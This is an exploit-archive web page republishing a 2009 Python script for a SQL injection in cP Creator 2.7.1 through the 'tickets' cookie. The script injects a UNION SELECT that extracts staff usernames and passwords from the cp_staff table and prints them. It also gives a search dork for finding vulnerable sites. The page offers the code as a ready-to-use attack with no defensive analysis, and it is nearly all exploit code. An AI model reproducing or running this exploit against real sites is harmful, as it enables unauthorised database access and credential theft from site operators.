首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 cP Creator 2.7.1 (Cookie tickets) Remote SQL Injection Exploit 来源：http://IrCrash.com 作者：Yazdanmehr 发布时间：2009-09-22   #!/usr/bin/python ##################################################################################### ####                  cP Creator v2.7.1 Remote Sql Injection                     #### ##################################################################################### #                                                                                   # #AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                # #Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         # #Our Site : http://IrCrash.com  -> (Coming Soon Again)                              # #My Official WebSite : http://R3dW0rm.ir                                            # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            # ##################################################################################### #                                                                                   # #Download : http://www.cpcreator.net                                                # #                                                                                   # #Dork : Powered by cP Creator v2.7.1                                                # #                                                                                   # #*** Magic Quotes gpc = Off ***                                                     # #                                                                                   # ###################################### TNX GOD ###################################### import sys,httplib p = '' if len(sys.argv) < 3 :     print "\nPowered by : R3d.W0rm"     print "Http://IrCrash.Com - Http://R3dW0rm.Ir"     print "Usage : code.py [host] /[path]"     exit() co = {"Cookie": "tickets=-999' union select 0,concat(0x265E21402A,user,0x3A,pass,0x265E21402A),2,3,4,5,6,7,8 from cp_staff/*;"} c = httplib.HTTPConnection(sys.argv[1],80) c.request("GET", "/" + sys.argv[2] + "/?page=support&task=ticket", p, co) data = c.getresponse().read() if "&^!@*" not in data :     print "Attack Failed ."     exit() output = data.split("&^!@*") print "\n+-------------------------------------+" print "\nPowered by : R3d.W0rm" print "Http://IrCrash.Com - Http://R3dW0rm.Ir\n" print "+-------------------------------------+" print "\n " + output[1]   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Winplot (.wp2 File) Local Buff ·Joomla com_mytube (user_id) Bl ·Microsoft IIS 5.0 FTP Server R ·BigAnt Server <= 2.50 SP6 Loca ·Mozilla Firefox versions 3.0.1 ·Gnuboard 0day&Exp ·Zeroboard 0day&Exp ·PJBlog version 3.0.6.170 suffe ·PHPCMS 2008 (job.php \$genre) ·InstantGet version 2.08 Active ·Charm Real Converter Pro versi ·Joomla Album component version   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved